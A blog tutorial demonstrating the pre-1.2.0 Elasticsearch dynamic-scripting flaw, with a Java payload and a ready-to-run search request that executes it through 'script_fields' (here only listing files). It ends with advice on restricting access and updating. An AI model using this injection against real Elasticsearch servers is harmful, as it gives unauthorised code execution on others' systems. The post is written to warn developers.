This week I had to look into elasticsearch. Simply put, it is a search engine with a simple to use interface. Interface as in REST API, I mean. Search is done by crafting query strings using JSON. It goes hand in hand with Javascript. Installation is just unzipping it, start it and then start indexing at heart desire. Java based, you know.

Scouring through the product website I found out that there’s a vulnerability listing. So I went through it and behold, interesting things ahead!

Today I am going to show you how to exploit older versions of elasticsearch. Why? Because developers need to know this. It shows how important it is to run updated software and be updated on their technology stack.

Affected versions

According to documentation anything prior to the 1.2.0 release. Tested with 1.1.1 and 1.1.2 – which was released in April and May 2014, respectively.

Tools needed

We don’t need many tools for this. Only

  • Chrome
  • Sense plugin/extension for easy elasticsearch interaction (rumors has it is has been withdrawn from circulation).
    — OR —
    Marvel Sense – which can be installed as a plugin to your elasticsearch instance.
    — OR —
    Just use Chrome or curl.
  • Java JDK (for when you want to confirm your Java code is working)

You might want to keep the elasticsearch documentation nearby if you don’t know this tool well.

Resources

More information about the security hole can be found here

Payload

First we need a payload. This payload is just plain old Java and is meant to be injected into the JSON search query. For this example I am just listing out files in the current folder. I could have crafted it more malicious – I don’t want or need to do that.

You might want to edit the payload in Notepad or similar and then compile it just to make sure your code is dandy.


import java.io.File;
String d='';
File dir = new File('.');
File[] files = dir.listFiles(); 

for(File file:files) {
    d+=','+file.getName();}
return d;

 

Exploit

This exploit can be executed straight through Sense in Chrome (or one of the other tools, slight customization may apply). If unfamiliar with how elasticsearch works, here’s a small headsup. You can write queries in JSON format. Here I simply search for anything available in the index. Somehow you can choose to toss in custom scripts into the mix to manipulate the result (or something like that). Looking at the “script_fields” we see two interesting things. First the “script” section, which holds the script I want to inject. Second, “payloadresult” holds the result generated from the script.

Just execute this in Sense and look at the result. Bam! Directory listing.

GET _search
{
"query": { "match_all": {}},
"script_fields": {"payloadresult": {"script": "import java.io.File; String d='';File dir = new File('.');File[] files=dir.listFiles(); for(File file:files) { d+=','+file.getName();} return d;"}}
}

 

Secure your elasticsearch instance

Documentation states that elasticsearch should not be made public. elasticsearch operates on ports 9200 and 9300 – which is pr. default open to everyone. There’s no login or anything – nothing is going to hold you back. I recommend putting a proxy or similar in front of it to restricting how users interact with it. More information can be found on their website.

And of course – always stay up to date on current release(s). Happily the elasticchoice people are open about their vulnerabilities and I applaud them for that and they give great advice on utilizing this marvelous tool.

This security hole is fixed in later edition of elasticsearch. So – hopefully you know why it is important to be up at speed on your technology stack.

Advertisements